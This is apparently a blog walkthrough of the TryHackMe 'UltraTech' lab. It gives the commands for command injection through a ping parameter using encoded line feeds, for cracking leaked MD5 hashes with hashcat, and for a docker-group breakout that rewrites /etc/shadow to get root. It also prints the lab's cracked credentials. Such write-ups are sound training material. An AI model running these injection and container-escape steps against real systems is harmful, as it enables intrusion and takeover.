Post

THM - UltraTech

UltraTech - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

Posted Updated
By Trompie
2 min read

THM - UltraTech

NMAP

1

nmap 10.10.200.110 -p- -T5

image1

1

nmap 10.10.200.110 -p 31331 -A

image2

  • Directory bruteforcing:
1
2

gobuster dir -u http://10.10.200.110:8081 -w /usr/share/seclists/Discovery/Web-Content/big.txt

image3

1
2

gobuster dir -u http://10.10.200.110:31331 -w /usr/share/seclists/Discovery/Web-Content/big.txt

image4

/robots.txt

image5

/utech_sitemap.txt

image6

/partners.html

image7

Got a login page

  • Look at traffic in Burp Looking at http://10.10.200.110:31331/partners.html

The site constantly pings to see if the server is online

image8

  • Changing the parameters of the GET request we can get RCE

URL encoding cheatsheet

  • Normal space is url encoded as %20

  • A line feed (0x0A) is url encoded as %0A A line feed means moving one line forward. The code is \n

  • You need to use a line feed character (\n) URL encoded because a normal space doesn’t work

1
2

GET /ping?ip=10.10.200.110%0Als

image9

1
2

GET /ping?ip=10.10.200.110%0Acat%20utech.db.sqlite

image10

(ignore the M before the names)

Found hashes:

r00t : f357a0c52799563c7c7b76c1e7543a32

admin : 0d0ea5111e3c1def594c1684e3b9be84

1
2

hash-identifier

image11

image12

  • Crack with hashcat ```bash hashcat -m 0 -a 0 hashes /usr/share/wordlists/rockyou.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

![image13](../resources/ce79b4f12e29423b8e2f3a9ee2f41500.png)

- Credentials:
**r00t : n100906**

**admin : mrsheafy**

- SSH with r00t

![image14](../resources/2b769bfa5fdc49cc8c8f54a4bab7f530.png)


![image15](../resources/95fc6f33053545219c13463a93df6f13.png)
- We can see we are in the docker group

- **<u>Escape the container:</u>**

```bash
docker images

image16

image17

  • If we run this command we’ll get an error:

image18

  • So we need to list the available images:
1
2

docker ps -a

image19

  • Change the image name to bash

Option 1 - command:

1
2
3
4

docker run -v /:/mnt --rm -it bash chroot /mnt sh

What this command does is, it creates a new container and mounts the entire ultratech-prod filesystem / to this container

image20

Option 2 - Command:

1

docker run -v /:/mnt -it bash

What this command does is similar to Option 1, it creates a new container and mounts the entire ultratech-prod filesystem /. But it mounts it to /mnt on the container

image21

image22

  • We are root (in the container)

  • We can now read all the root files

  • To get root on the host machine (using Option 1):

  • On Kali - Make a MD5 hash:
1
2

mkpasswd -m md5 pass123

image23

  • On the target - in the container (because we’re root now)
1
2

vi /etc/shadow

Press i (for insert)

Remove the hash of the root user (second field) and replace with the hash you made

image24

1
2
3
4
5
6

Press ESC

Press :wq

ENTER
  • exit out of the container ```bash exit
1
2

```bash
su root

Enter password you made

image25

image26

CTF, THM
docker breakout gobuster hashcat nmap privilege escalation rce sqli tryhackme hackthebox immersivelabs thm iml htb
This post is licensed under CC BY 4.0 by the author.